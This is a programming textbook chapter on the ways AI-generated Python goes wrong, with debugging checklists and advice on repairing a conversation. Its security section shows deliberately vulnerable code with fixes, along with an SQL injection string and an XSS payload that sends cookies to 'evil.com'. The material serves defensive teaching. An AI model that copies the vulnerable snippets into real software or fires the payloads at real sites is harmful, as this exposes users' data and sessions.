> "The first rule of working with AI-generated code is the same as the first rule of working with any code: it might be wrong." — Adapted from Kernighan's Law
In This Chapter
- Learning Objectives
- Introduction
- 14.1 The Taxonomy of AI Coding Failures
- 14.2 Hallucinated APIs and Libraries
- 14.3 Subtle Logic Errors
- 14.4 Security Vulnerabilities in AI Code
- 14.5 Performance Anti-Patterns
- 14.6 Outdated Patterns and Deprecated APIs
- 14.7 The Confidence Problem: When AI Sounds Right but Isn't
- 14.8 Debugging AI-Generated Code Systematically
- 14.9 Recovery Strategies and Conversation Repair
- 14.10 Building Resilience: The Trust-but-Verify Mindset
- Chapter Summary
Chapter 14: When AI Gets It Wrong
"The first rule of working with AI-generated code is the same as the first rule of working with any code: it might be wrong." — Adapted from Kernighan's Law
Learning Objectives
By the end of this chapter, you will be able to:
- Remember the major categories of AI coding failures and recognize examples of each (Bloom's: Remember)
- Understand why AI models produce hallucinated APIs, subtle logic errors, and security vulnerabilities (Bloom's: Understand)
- Analyze AI-generated code for common failure patterns including off-by-one errors, race conditions, and performance anti-patterns (Bloom's: Analyze)
- Evaluate the confidence level of AI-generated code and identify situations where the AI is likely wrong despite sounding certain (Bloom's: Evaluate)
- Apply systematic debugging approaches specifically designed for AI-generated code (Bloom's: Apply)
- Create verification workflows that catch AI mistakes before they reach production (Bloom's: Create)
Introduction
Every chapter of this book so far has celebrated what AI coding assistants can do. This chapter is different. This chapter is about what they get wrong — and they get things wrong often.
If you have been following along, you have probably already encountered moments where AI-generated code looked correct, ran without errors on your first test, and then failed spectacularly under real-world conditions. Perhaps a library import referenced a package that does not exist. Perhaps a loop processed one too many or one too few items. Perhaps the code worked perfectly — except it was wide open to SQL injection.
This chapter is not meant to scare you away from AI-assisted development. It is meant to make you better at it. The developers who struggle most with vibe coding are not those who lack programming skill — they are the ones who trust AI output without verification. The developers who thrive are those who have internalized what we call the trust-but-verify mindset: use AI as a powerful collaborator, but always validate its work.
We will build a comprehensive taxonomy of AI coding failures, examine real examples of each failure type, develop systematic debugging strategies, and learn recovery techniques for when a conversation with an AI assistant goes off the rails. By the end, you will have the skills to catch AI mistakes before your users do.
Note
: This chapter builds directly on the code review skills from Chapter 7. If you skipped that chapter, consider reading Section 7.6 (Spotting Potential Issues) before continuing.
14.1 The Taxonomy of AI Coding Failures
Before we dive into specific failure types, it helps to have a map of the territory. AI coding failures fall into several distinct categories, each with different causes, detection difficulty, and potential impact.
The Failure Spectrum
AI coding failures range from immediately obvious to deeply hidden:
| Category | Detection Difficulty | Typical Impact | Example |
|---|---|---|---|
| Hallucinated APIs | Easy (import fails) | Build failure | from sklearn.neural import DeepClassifier |
| Syntax errors | Easy (interpreter catches) | Build failure | Mismatched parentheses, invalid Python |
| Runtime errors | Medium (fails on execution) | Crash | TypeError from wrong argument types |
| Logic errors | Hard (produces wrong results) | Silent data corruption | Off-by-one in loop bounds |
| Security vulnerabilities | Hard (works correctly but unsafely) | Data breach | SQL injection, XSS, hardcoded secrets |
| Performance anti-patterns | Hard (works but slowly) | Degraded user experience | N+1 queries, blocking I/O |
| Outdated patterns | Medium (may work but deprecated) | Technical debt | Using removed APIs, old syntax |
| Architectural issues | Very hard (works at small scale) | Scalability failure | Tight coupling, missing abstractions |
Why AI Gets Things Wrong
Understanding why AI makes mistakes helps you predict when it will make them. The root causes include:
Training data mixture. AI models learn from vast corpora of code, which includes both excellent code and terrible code. The model does not inherently know which is which. Code from Stack Overflow answers, tutorials written by beginners, and outdated blog posts all contribute to the training data alongside production-quality code.
Statistical pattern matching. Language models predict the most likely next token based on patterns in training data. When a pattern is common but wrong — such as a frequently repeated security anti-pattern — the model may reproduce it confidently.
Knowledge cutoff. Models have a training data cutoff date. APIs change, libraries release new major versions, and best practices evolve. The model does not know about these changes.
Context limitations. Models work within a limited context window. When your project grows beyond what fits in context, the model may lose track of important constraints, data types, or architectural decisions made earlier.
The completion imperative. AI assistants are trained to be helpful and to provide complete answers. They almost never say "I don't know" or "I'm not sure about this." When the model lacks knowledge, it generates plausible-sounding but incorrect code rather than admitting uncertainty.
Intuition: Think of AI-generated code as a first draft from a junior developer who is very well-read but has never actually run any code in production. They know patterns and conventions, but they have not felt the pain of a 2 AM production incident caused by an unhandled edge case.
The Criticality Matrix
Not all failures are equally dangerous. Use this matrix to prioritize what to verify:
| Low Likelihood | High Likelihood | |
|---|---|---|
| High Impact | Security vulnerabilities, race conditions | Logic errors in business rules |
| Low Impact | Stylistic inconsistencies | Verbose or non-idiomatic code |
Always verify high-impact areas first, regardless of likelihood. A single SQL injection vulnerability matters more than a hundred stylistic issues.
14.2 Hallucinated APIs and Libraries
The most distinctive failure mode of AI coding assistants is hallucination — generating references to functions, methods, classes, or entire libraries that do not exist. This is not a bug in the traditional sense; the AI has essentially invented an API that seems like it should exist based on naming conventions and patterns in the training data.
What Hallucination Looks Like
Here is an example. You ask an AI assistant to help you with image processing, and it produces:
from PIL import Image
from PIL.Filters import AdaptiveSharpening
def enhance_image(path: str, strength: float = 0.8) -> Image.Image:
"""Enhance image sharpness using adaptive sharpening."""
img = Image.open(path)
sharpened = img.filter(AdaptiveSharpening(strength=strength))
return sharpened
This code looks perfectly reasonable. The PIL library is real. The Image class is real. The coding style is correct. But PIL.Filters.AdaptiveSharpening does not exist. The AI invented it because it sounds like something that should exist in an image processing library. The actual PIL approach would use ImageFilter.SHARPEN or ImageEnhance.Sharpness.
Common Hallucination Patterns
Invented submodules. The AI correctly identifies a real library but invents a submodule within it:
# Hallucinated: requests.async does not exist
from requests.async import AsyncSession
# Real alternatives:
import aiohttp
# or
from httpx import AsyncClient
Non-existent function parameters. The function is real, but the AI adds parameters that do not exist:
# Hallucinated: 'encoding' is not a valid parameter for json.loads
data = json.loads(raw_text, encoding="utf-8")
# Correct (encoding parameter was removed in Python 3.9):
data = json.loads(raw_text)
Plausible method names. The AI generates a method name that follows the library's naming convention but does not actually exist:
# Hallucinated: pandas has no .to_nested_json() method
df.to_nested_json("output.json")
# Real approach:
df.to_json("output.json", orient="records")
Entirely fabricated libraries. Sometimes the AI invents entire packages:
# Hallucinated: this package does not exist
from datavalidator import Schema, validate_strict
# Real alternatives:
from pydantic import BaseModel
# or
from marshmallow import Schema, fields
Common Pitfall: Hallucinated package names are especially dangerous because someone could create a malicious package with that exact name on PyPI. This is called dependency confusion or typosquatting. If you
pip installa hallucinated package name, you might actually install malware that someone published under that name. Always verify that a package exists and is legitimate before installing it.
How to Detect Hallucinations
Run the code immediately. The simplest test is to execute the imports. If Python raises an ImportError or ModuleNotFoundError, you have found a hallucination.
Check official documentation. Before using any API the AI suggests, verify it exists in the official documentation. This takes seconds and prevents hours of debugging.
Use your IDE. Modern IDEs with language server support will flag unresolved imports with red underlines before you even run the code.
Search PyPI for packages. If the AI suggests a library you have not heard of, search for it on pypi.org before running pip install.
Verify on the REPL. Open a Python REPL and try:
import some_module
dir(some_module) # List actual attributes
help(some_module.some_function) # Check actual signature
Best Practice: Build a habit of verifying every import that an AI suggests if you are not already familiar with the library. This single practice will eliminate the most embarrassing category of AI-generated bugs.
14.3 Subtle Logic Errors
Logic errors are far more dangerous than hallucinated APIs because the code runs without errors — it just produces wrong results. These bugs can persist for months before anyone notices.
Off-by-One Errors
The classic off-by-one error is AI's most frequent logic mistake. Consider this AI-generated function to extract a sublist:
def get_page(items: list, page: int, page_size: int) -> list:
"""Return a page of items from a list."""
start = page * page_size
end = start + page_size + 1 # BUG: +1 causes overlap between pages
return items[start:end]
The bug is on the line computing end. Python slicing already excludes the end index, so adding 1 means each page returns one extra item (overlapping with the next page). The correct version:
def get_page(items: list, page: int, page_size: int) -> list:
"""Return a page of items from a list."""
start = page * page_size
end = start + page_size # Correct: Python slicing is already exclusive
return items[start:end]
Boundary Condition Errors
AI often fails to handle empty inputs, single-element collections, or maximum values:
def find_median(numbers: list[float]) -> float:
"""Find the median of a list of numbers."""
sorted_nums = sorted(numbers)
mid = len(sorted_nums) // 2
if len(sorted_nums) % 2 == 0:
return (sorted_nums[mid - 1] + sorted_nums[mid]) / 2
return sorted_nums[mid]
This code looks correct — and it works for most inputs. But what happens when numbers is empty? sorted_nums becomes [], mid becomes 0, and we get an IndexError. The AI did not add a guard clause:
def find_median(numbers: list[float]) -> float:
"""Find the median of a list of numbers."""
if not numbers:
raise ValueError("Cannot compute median of empty list")
sorted_nums = sorted(numbers)
mid = len(sorted_nums) // 2
if len(sorted_nums) % 2 == 0:
return (sorted_nums[mid - 1] + sorted_nums[mid]) / 2
return sorted_nums[mid]
Race Conditions
When AI generates concurrent code, race conditions are common because the model focuses on the happy path:
import threading
class Counter:
"""Thread-safe counter.""" # BUG: Not actually thread-safe!
def __init__(self):
self.value = 0
def increment(self):
self.value += 1 # Race condition: read-modify-write is not atomic
def get(self) -> int:
return self.value
The docstring says "thread-safe" but the implementation is not. The += operation involves reading the current value, adding one, and writing back — three steps that can be interleaved between threads. The fix:
import threading
class Counter:
"""Thread-safe counter using a lock."""
def __init__(self):
self.value = 0
self._lock = threading.Lock()
def increment(self):
with self._lock:
self.value += 1
def get(self) -> int:
with self._lock:
return self.value
Incorrect Algorithm Implementation
Sometimes AI produces code that almost implements the right algorithm but has a subtle flaw:
def binary_search(arr: list[int], target: int) -> int:
"""Return index of target in sorted array, or -1 if not found."""
low, high = 0, len(arr) - 1
while low <= high:
mid = (low + high) // 2 # Potential integer overflow in other languages
if arr[mid] == target:
return mid
elif arr[mid] < target:
low = mid # BUG: should be mid + 1
else:
high = mid # BUG: should be mid - 1
return -1
This binary search can enter an infinite loop. When arr[mid] < target, setting low = mid (instead of mid + 1) means that if low and high are adjacent, mid will equal low forever. The corrected version uses low = mid + 1 and high = mid - 1.
Real-World Application: In production systems, subtle logic errors in data processing pipelines can corrupt millions of records before anyone notices. One real-world example involved an AI-generated ETL (Extract, Transform, Load) script that had an off-by-one error in date range filtering. It skipped the first day of every month, leading to systematic data loss that was not caught for three weeks.
Incorrect Regular Expressions
AI frequently generates regex patterns that are close but not quite right:
import re
def validate_email(email: str) -> bool:
"""Validate an email address."""
pattern = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
return bool(re.match(pattern, email))
This pattern looks reasonable but rejects valid emails with characters like !, #, or ' in the local part (which are technically allowed by RFC 5321). It also accepts user@.com (domain starting with a dot) and user@com..example (consecutive dots in domain). Email validation is notoriously hard, and AI tends to produce the "common but wrong" regex from countless Stack Overflow answers.
Common Pitfall: Be especially suspicious of AI-generated regular expressions. They frequently handle the common cases correctly while failing on edge cases. Always test regex patterns with a comprehensive set of both valid and invalid inputs, including edge cases.
14.4 Security Vulnerabilities in AI Code
Security vulnerabilities in AI-generated code deserve special attention because they are simultaneously common, hard to detect, and potentially catastrophic. The model has seen millions of examples of insecure code patterns — and it reproduces them faithfully.
SQL Injection
The most classic web vulnerability, and AI generates it routinely:
def get_user(username: str) -> dict:
"""Fetch user from database."""
query = f"SELECT * FROM users WHERE username = '{username}'" # VULNERABLE
cursor.execute(query)
return cursor.fetchone()
If username is ' OR '1'='1' --, this query returns all users. The fix is parameterized queries:
def get_user(username: str) -> dict:
"""Fetch user from database."""
query = "SELECT * FROM users WHERE username = %s" # Safe: parameterized
cursor.execute(query, (username,))
return cursor.fetchone()
Common Pitfall: AI assistants will sometimes generate parameterized queries in some functions and string-concatenated queries in others within the same codebase. Inconsistency is the enemy of security. Review every database query, not just the ones that look suspicious.
Cross-Site Scripting (XSS)
When generating web code, AI often fails to escape user input:
from flask import Flask, request
app = Flask(__name__)
@app.route('/search')
def search():
query = request.args.get('q', '')
# VULNERABLE: user input directly in HTML
return f"<h1>Search results for: {query}</h1>"
An attacker can inject <script>document.location='http://evil.com/steal?c='+document.cookie</script> as the query parameter. The fix uses proper escaping:
from flask import Flask, request
from markupsafe import escape
app = Flask(__name__)
@app.route('/search')
def search():
query = request.args.get('q', '')
return f"<h1>Search results for: {escape(query)}</h1>" # Safe: escaped
Hardcoded Secrets
AI assistants frequently generate code with placeholder secrets that look like they should be replaced but sometimes are not:
import jwt
SECRET_KEY = "super-secret-key-change-me" # VULNERABLE: hardcoded secret
def create_token(user_id: int) -> str:
return jwt.encode({"user_id": user_id}, SECRET_KEY, algorithm="HS256")
The fix uses environment variables:
import os
import jwt
SECRET_KEY = os.environ["JWT_SECRET_KEY"] # Safe: from environment
def create_token(user_id: int) -> str:
return jwt.encode({"user_id": user_id}, SECRET_KEY, algorithm="HS256")
Path Traversal
AI-generated file-handling code often fails to validate paths:
from flask import Flask, send_file, request
app = Flask(__name__)
@app.route('/download')
def download():
filename = request.args.get('file')
# VULNERABLE: allows ../../etc/passwd
return send_file(f'/uploads/{filename}')
The fix validates the resolved path:
import os
from pathlib import Path
from flask import Flask, send_file, request, abort
app = Flask(__name__)
UPLOAD_DIR = Path('/uploads').resolve()
@app.route('/download')
def download():
filename = request.args.get('file')
if not filename:
abort(400)
file_path = (UPLOAD_DIR / filename).resolve()
if not str(file_path).startswith(str(UPLOAD_DIR)):
abort(403) # Path traversal attempt
if not file_path.is_file():
abort(404)
return send_file(file_path)
Insecure Deserialization
AI sometimes suggests pickle for data serialization without warning about the dangers:
import pickle
def load_user_data(data_bytes: bytes) -> dict:
"""Load user-submitted data."""
return pickle.loads(data_bytes) # VULNERABLE: arbitrary code execution
Using pickle.loads on untrusted data allows arbitrary code execution. If the data comes from a user or external source, use json instead:
import json
def load_user_data(data_bytes: bytes) -> dict:
"""Load user-submitted data."""
return json.loads(data_bytes) # Safe: JSON cannot execute code
Weak Cryptography
AI models sometimes suggest outdated or weak cryptographic algorithms:
import hashlib
def hash_password(password: str) -> str:
"""Hash a password for storage."""
return hashlib.md5(password.encode()).hexdigest() # VULNERABLE: MD5 is broken
MD5 is cryptographically broken and unsuitable for password hashing. Even SHA-256 alone is not appropriate for passwords (it is too fast). The correct approach uses a purpose-built password hashing function:
import bcrypt
def hash_password(password: str) -> bytes:
"""Hash a password for storage using bcrypt."""
return bcrypt.hashpw(password.encode(), bcrypt.gensalt())
def verify_password(password: str, hashed: bytes) -> bool:
"""Verify a password against its hash."""
return bcrypt.checkpw(password.encode(), hashed)
Best Practice: For security-critical code, never accept AI output at face value. Cross-reference against the OWASP Top 10 (owasp.org/www-project-top-ten) and use security-focused static analysis tools like
banditfor Python. The few minutes this takes can prevent catastrophic breaches.
14.5 Performance Anti-Patterns
AI-generated code often prioritizes readability and correctness over performance. While this is usually the right trade-off for prototypes, it can create serious problems in production systems.
The N+1 Query Problem
This is the most common performance anti-pattern in AI-generated database code:
def get_all_orders_with_customers(db_session):
"""Get all orders with customer details."""
orders = db_session.query(Order).all() # 1 query
result = []
for order in orders:
customer = db_session.query(Customer).get(order.customer_id) # N queries
result.append({
"order_id": order.id,
"total": order.total,
"customer_name": customer.name
})
return result
For 1,000 orders, this executes 1,001 database queries. The fix uses a JOIN or eager loading:
def get_all_orders_with_customers(db_session):
"""Get all orders with customer details using a JOIN."""
results = (
db_session.query(Order, Customer)
.join(Customer, Order.customer_id == Customer.id)
.all()
)
return [
{
"order_id": order.id,
"total": order.total,
"customer_name": customer.name
}
for order, customer in results
]
Unnecessary Data Copying
AI frequently generates code that copies data structures unnecessarily:
def process_large_dataset(data: list[dict]) -> list[dict]:
"""Process and filter a large dataset."""
# Unnecessary copy: sorted() creates a new list
sorted_data = sorted(data, key=lambda x: x['timestamp'])
# Another copy: list comprehension creates another new list
filtered = [item for item in sorted_data if item['status'] == 'active']
# Yet another copy: another list comprehension
result = [
{**item, 'processed': True}
for item in filtered
]
return result
For a dataset of millions of records, this creates three full copies. A more memory-efficient approach uses generators:
def process_large_dataset(data: list[dict]) -> list[dict]:
"""Process and filter a large dataset efficiently."""
data.sort(key=lambda x: x['timestamp']) # In-place sort
return [
{**item, 'processed': True}
for item in data
if item['status'] == 'active'
]
Blocking I/O in Async Code
AI sometimes mixes synchronous and asynchronous patterns:
import asyncio
import requests # Synchronous library!
async def fetch_all_urls(urls: list[str]) -> list[str]:
"""Fetch all URLs concurrently."""
results = []
for url in urls:
# BUG: requests.get is blocking, defeats the purpose of async
response = requests.get(url)
results.append(response.text)
return results
This code uses async but makes blocking HTTP calls, so nothing actually runs concurrently. The fix uses an async HTTP library:
import asyncio
import aiohttp
async def fetch_all_urls(urls: list[str]) -> list[str]:
"""Fetch all URLs concurrently."""
async with aiohttp.ClientSession() as session:
tasks = [fetch_one(session, url) for url in urls]
return await asyncio.gather(*tasks)
async def fetch_one(session: aiohttp.ClientSession, url: str) -> str:
"""Fetch a single URL."""
async with session.get(url) as response:
return await response.text()
Quadratic Algorithms Hidden in Clean Code
Sometimes AI generates beautifully readable code that hides O(n^2) complexity:
def find_duplicates(items: list[str]) -> list[str]:
"""Find duplicate items in a list."""
duplicates = []
for item in items:
if items.count(item) > 1 and item not in duplicates: # O(n) * 2 per iteration
duplicates.append(item)
return duplicates
The items.count() call is O(n) and item not in duplicates is also O(n), making this O(n^2). For a list of 100,000 items, this becomes unusably slow. The fix uses a set:
from collections import Counter
def find_duplicates(items: list[str]) -> list[str]:
"""Find duplicate items in a list."""
counts = Counter(items) # O(n)
return [item for item, count in counts.items() if count > 1] # O(n)
Advanced: When reviewing AI-generated code for performance, mentally trace the time complexity of each line. Look for nested loops,
.count()calls inside loops,inchecks on lists (O(n)) versus sets (O(1)), and string concatenation in loops (which creates a new string each iteration).
14.6 Outdated Patterns and Deprecated APIs
AI models are trained on historical data, which means they sometimes suggest patterns that were appropriate years ago but are now outdated or deprecated.
Python 2 Remnants
Even though Python 2 reached end-of-life in January 2020, AI occasionally generates Python 2 patterns:
# Outdated: Python 2 style print statement
print "Hello, world"
# Outdated: Python 2 style string formatting
message = "Hello, %s. You are %d years old." % (name, age)
# Outdated: Python 2 style exception handling
try:
risky_operation()
except Exception, e:
print e
# Outdated: inheriting from object explicitly (unnecessary in Python 3)
class MyClass(object):
pass
The modern Python 3 equivalents:
print("Hello, world")
message = f"Hello, {name}. You are {age} years old."
try:
risky_operation()
except Exception as e:
print(e)
class MyClass:
pass
Deprecated Standard Library Usage
# Deprecated: asyncio.get_event_loop() in Python 3.10+
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
# Modern:
asyncio.run(main())
# Deprecated: using typing.List, typing.Dict in Python 3.9+
from typing import List, Dict
def process(items: List[Dict[str, int]]) -> List[str]:
pass
# Modern: use built-in types directly
def process(items: list[dict[str, int]]) -> list[str]:
pass
# Deprecated: os.path for path manipulation
import os
path = os.path.join(base_dir, "data", "file.txt")
exists = os.path.exists(path)
# Modern: pathlib
from pathlib import Path
path = Path(base_dir) / "data" / "file.txt"
exists = path.exists()
Framework-Specific Deprecations
AI often suggests deprecated patterns from popular frameworks:
# Deprecated Flask pattern (before Flask 2.0)
@app.route('/users', methods=['GET'])
def get_users():
pass
@app.route('/users', methods=['POST'])
def create_user():
pass
# Modern Flask (2.0+)
@app.get('/users')
def get_users():
pass
@app.post('/users')
def create_user():
pass
# Deprecated SQLAlchemy 1.x query style
users = session.query(User).filter(User.age > 18).all()
# Modern SQLAlchemy 2.x style
from sqlalchemy import select
stmt = select(User).where(User.age > 18)
users = session.execute(stmt).scalars().all()
Best Practice: When an AI suggests a library pattern you are not sure about, check the library's changelog or migration guide. Search for phrases like "[library name] deprecation warnings" or "[library name] migration guide" to quickly identify whether the suggested pattern is current.
Detecting Outdated Patterns
Python's warning system can help catch deprecated usage:
import warnings
warnings.filterwarnings('error', category=DeprecationWarning)
This converts deprecation warnings into errors, making them impossible to ignore during testing. You can also use tools like pyupgrade to automatically modernize Python syntax.
14.7 The Confidence Problem: When AI Sounds Right but Isn't
Perhaps the most insidious aspect of AI coding failures is the confidence problem. AI assistants present incorrect code with the same confident tone as correct code. There is no "I'm not sure" disclaimer, no wavering, no hedge. This makes it psychologically difficult to question AI-generated output.
Why AI Never Says "I Don't Know"
Language models generate text token by token, predicting the most probable next token based on context. They do not have an internal mechanism for evaluating their own uncertainty. The model does not think, "I'm 40% confident in this function" — it simply generates the most likely completion given the prompt.
This means:
- Completely fabricated APIs are described as if they are standard library features
- Incorrect algorithm implementations come with detailed, accurate-sounding docstrings
- Security anti-patterns are presented alongside correct code with no distinction
- Made-up configuration options are suggested with plausible-sounding explanations
The Expertise Illusion
AI-generated code often reads like it was written by an expert. The variable names are well-chosen, the docstrings are thorough, the code style is clean. This creates an expertise illusion where the superficial quality of the code masks substantive errors.
Consider this example:
def calculate_compound_interest(
principal: float,
annual_rate: float,
years: int,
compounding_frequency: int = 12
) -> float:
"""
Calculate compound interest using the standard formula.
A = P(1 + r/n)^(nt)
Args:
principal: Initial investment amount
annual_rate: Annual interest rate as a decimal (e.g., 0.05 for 5%)
years: Number of years
compounding_frequency: Times interest is compounded per year
Returns:
Final amount after compound interest
"""
amount = principal * (1 + annual_rate / compounding_frequency) ** (
compounding_frequency * years
)
return round(amount, 2)
This looks flawless. The docstring is thorough, the type hints are correct, the formula is clearly documented. But what if the caller passes annual_rate=5 (meaning 5%) instead of annual_rate=0.05? The function will silently return an astronomically wrong result. An experienced developer would add validation:
if annual_rate > 1:
raise ValueError(
f"annual_rate={annual_rate} seems too high. "
f"Did you mean {annual_rate / 100}? Pass rate as a decimal (0.05 for 5%)."
)
The AI's polished presentation made it easy to skip critical review.
Signals That AI Might Be Wrong
While AI does not flag its own uncertainty, there are signals you can watch for:
Overly specific details on obscure topics. If the AI provides very detailed configuration for a niche library or platform, verify every option. AI is most likely to hallucinate when the topic has limited representation in training data.
Inconsistency within the same response. If the AI uses one approach in one function and a contradictory approach in another, at least one is wrong.
Suspiciously convenient solutions. If a complex problem is solved with a single function call to an API you have never heard of, verify that the API exists.
Solutions that avoid the hard part. If the AI's solution to a complex problem seems too simple, it may have glossed over essential complexity (error handling, edge cases, concurrency control).
Code that matches common but wrong patterns. Patterns that appear frequently in tutorials and Stack Overflow answers (like using MD5 for passwords or string formatting for SQL) are exactly what AI reproduces most confidently.
Intuition: Develop a "that's too easy" instinct. When a genuinely hard problem gets a clean, short solution from the AI, that is your signal to verify extra carefully. Hard problems usually require hard solutions, and if the code seems too neat, important complexity may be missing.
14.8 Debugging AI-Generated Code Systematically
Debugging AI-generated code requires a different approach than debugging code you wrote yourself. You did not write it, so you lack the mental model of how it is supposed to work. You need to build that mental model before you can find the bugs.
The VERIFY Framework
Use this systematic framework when reviewing AI-generated code:
V — Validate imports. Check that every imported module and name actually exists. Run the imports in a REPL.
E — Examine edge cases. Test with empty inputs, single elements, maximum values, None/null values, and negative numbers.
R — Review security. Check for SQL injection, XSS, hardcoded secrets, path traversal, insecure deserialization, and weak cryptography.
I — Inspect logic. Trace through the code mentally with concrete values. Pay special attention to loop bounds, comparison operators (< vs <=, > vs >=), and return values.
F — Find performance issues. Look for nested loops, queries inside loops, unnecessary copying, and blocking operations in async code.
Y — Yell about types. Check that types match expectations throughout the data flow. A function that receives a string when it expects an integer will fail silently or produce wrong results.
Practical Debugging Techniques
Add assertion statements. Before and after AI-generated code blocks, add assertions that verify your expectations:
def process_orders(orders: list[dict]) -> list[dict]:
assert all(isinstance(o, dict) for o in orders), "All orders must be dicts"
assert all('id' in o for o in orders), "All orders must have 'id'"
result = ai_generated_processing_logic(orders)
assert len(result) <= len(orders), "Should not create more orders than input"
assert all('total' in r for r in result), "All results must have 'total'"
return result
Use print debugging strategically. When you cannot understand what AI-generated code is doing, add print statements at key points:
def mystery_function(data):
print(f"Input: {data[:3]}... (length={len(data)})") # Sample first 3
intermediate = step_one(data)
print(f"After step_one: {type(intermediate)}, length={len(intermediate)}")
result = step_two(intermediate)
print(f"After step_two: {type(result)}, first_item={result[0] if result else 'EMPTY'}")
return result
Write targeted test cases. Create tests that specifically probe the areas where AI is likely to fail:
def test_pagination_edge_cases():
"""Test AI-generated pagination with tricky inputs."""
items = list(range(10))
# Normal case
assert get_page(items, 0, 3) == [0, 1, 2]
assert get_page(items, 1, 3) == [3, 4, 5]
# Edge cases AI often gets wrong
assert get_page(items, 3, 3) == [9] # Last partial page
assert get_page(items, 4, 3) == [] # Beyond last page
assert get_page([], 0, 3) == [] # Empty list
assert get_page(items, 0, 100) == items # Page size > list size
Use a debugger. For complex AI-generated code, step through it in a debugger rather than trying to understand it by reading alone:
# Add this line before the suspicious code
import pdb; pdb.set_trace()
Or use VS Code's built-in debugger with breakpoints.
Best Practice: When debugging AI-generated code, resist the urge to fix the code before you understand it. First build a complete mental model of what the code does (right and wrong). Then fix it. If you patch symptoms without understanding, you will introduce new bugs.
Type Checking as a Debugging Tool
Static type checking catches many AI errors before runtime:
# Install mypy: pip install mypy
# Run: mypy your_file.py
AI-generated code often has type inconsistencies that mypy catches:
def get_user_age(user: dict) -> int:
return user.get('age') # mypy error: returns Optional[int], not int
Using Linters Effectively
Configure your linter to catch common AI mistakes:
# .flake8 configuration
[flake8]
max-complexity = 10
select = E,W,F,C90
Tools like pylint, ruff, and flake8 catch issues that are invisible to the eye but obvious to static analysis.
14.9 Recovery Strategies and Conversation Repair
Sometimes an AI conversation goes so far off track that individual bug fixes are not enough. You need strategies for recovering the conversation — getting the AI back on a productive path.
Recognizing a Derailed Conversation
Signs that your AI conversation has gone off the rails:
- Circular fixes: You report a bug, the AI "fixes" it but introduces a new bug, you report that, and the cycle repeats.
- Contradictory approaches: The AI switches between fundamentally different architectural approaches across responses.
- Increasing complexity: Each "fix" makes the code more complex rather than simpler.
- Losing context: The AI forgets constraints or requirements you specified earlier.
- Cargo cult fixes: The AI makes changes that look relevant but do not actually address the problem.
The Nuclear Option: Start Fresh
Sometimes the best recovery strategy is to start a new conversation. This is especially appropriate when:
- The context window is heavily polluted with failed attempts
- The AI has adopted a fundamentally wrong architecture
- More than three rounds of fixes have failed to resolve the issue
When starting fresh, include in your new prompt:
- A clear description of what you are building
- The specific constraints and requirements
- What approach you tried before and why it failed
- The specific behavior you need
I'm building a pagination function for a REST API. My previous
attempt had off-by-one errors in the page boundaries.
Requirements:
- Pages are 0-indexed (first page is page 0)
- page_size items per page
- Last page may have fewer than page_size items
- Requesting beyond the last page returns empty list
- Empty input returns empty list for any page
Please generate the function with comprehensive edge case handling.
The Targeted Reprompt
Instead of starting completely fresh, you can give the AI a very targeted correction:
Stop. The current approach of building the SQL query with string
concatenation is fundamentally insecure. Let's start the database
layer over using parameterized queries only. Do not use f-strings
or string formatting for any SQL query. Use placeholders (%s for
MySQL, ? for SQLite, $1 for PostgreSQL) in every query.
Key elements of an effective targeted reprompt: - Clear stop signal: "Stop" or "Let's start over on this part" - Identification of the fundamental problem: Not just the symptom, but the root cause - Explicit constraint: What the new approach must do differently - Specific enough to prevent repetition: Do not leave room for the AI to drift back to the old pattern
The Incremental Rollback
If the AI's code was mostly correct before a recent "fix" broke it, roll back to the last known good state:
The code was working correctly before the last change. Let's go
back to the version that used a simple for loop instead of the
recursive approach. Here is the working version:
[paste the working code]
Now, starting from this working version, let's fix ONLY the issue
where it doesn't handle empty lists. Do not change anything else.
The Constraint Fence
When the AI keeps making the same type of mistake, add explicit constraints:
Generate the data processing function with these constraints:
1. NO nested loops (time complexity must be O(n) or O(n log n))
2. NO string concatenation for building queries
3. ALL database calls must use parameterized queries
4. EVERY function must handle empty input gracefully
5. NO global state or module-level variables
Violating any of these constraints means the code is wrong.
Please check each constraint before finalizing.
Real-World Application: Experienced vibe coders report that the most productive conversations follow a pattern: start with a clear specification (Chapter 10), generate code, review carefully (Chapter 7), and if problems are found, use targeted reprompts rather than trying to fix everything incrementally. The "three strikes" rule is common: if three rounds of fixes do not resolve the issue, start a fresh conversation.
Saving Good Code Before Experimenting
Before asking the AI to make significant changes to working code, save the current version:
# Save to a file, copy to clipboard, or commit to git
git add . && git commit -m "Working version before AI refactor attempt"
This gives you a rollback point if the AI's changes make things worse. Version control is your best friend when doing iterative AI-assisted development (see Chapter 31 for detailed version control workflows).
14.10 Building Resilience: The Trust-but-Verify Mindset
The final and most important lesson of this chapter is attitudinal. The developers who are most effective with AI coding assistants share a common mindset: they trust the AI enough to use it extensively, but they verify its output rigorously.
The Trust Spectrum
Developers typically fall somewhere on this spectrum:
Blind trust (dangerous): Accepts all AI output without review. Copies code directly into production. Does not test edge cases. This developer will eventually have a serious incident.
Healthy skepticism (ideal): Uses AI extensively to accelerate development. Reviews every piece of generated code. Tests edge cases and security. Verifies imports and APIs. Treats AI output as a strong first draft that needs review.
Excessive distrust (unproductive): Second-guesses everything. Rewrites most AI output from scratch. Spends more time verifying than the code would take to write manually. Loses the productivity benefits of AI assistance.
The goal is to land in the middle — healthy skepticism. Use AI freely and confidently, but build verification into your workflow as a non-negotiable step.
The Verification Checklist
Build a personal verification checklist and use it consistently. Here is a starter template:
## AI Code Verification Checklist
### Imports and Dependencies
- [ ] All imports resolve to real modules
- [ ] Library versions are compatible
- [ ] No unnecessary dependencies added
### Logic
- [ ] Works with empty input
- [ ] Works with single-element input
- [ ] Works with maximum/boundary values
- [ ] Loop bounds are correct (no off-by-one)
- [ ] Comparison operators are correct (<= vs <)
### Security
- [ ] No SQL injection (all queries parameterized)
- [ ] No XSS (all user input escaped)
- [ ] No hardcoded secrets
- [ ] No path traversal vulnerabilities
- [ ] No insecure deserialization
### Performance
- [ ] No N+1 query patterns
- [ ] No quadratic algorithms on large inputs
- [ ] No blocking I/O in async code
- [ ] No unnecessary data copying
### Style and Maintenance
- [ ] Code matches project conventions
- [ ] No deprecated APIs or patterns
- [ ] Error messages are helpful
- [ ] Type hints are accurate
Automated Verification
Automate as much of the verification as possible. Set up your project with:
- Type checking (
mypyorpyright) to catch type errors - Linting (
ruff,flake8, orpylint) to catch style and logic issues - Security scanning (
bandit) to catch common vulnerabilities - Import checking to verify all imports resolve
- Tests (especially edge case tests) to catch logic errors
- Pre-commit hooks to run all of the above before every commit
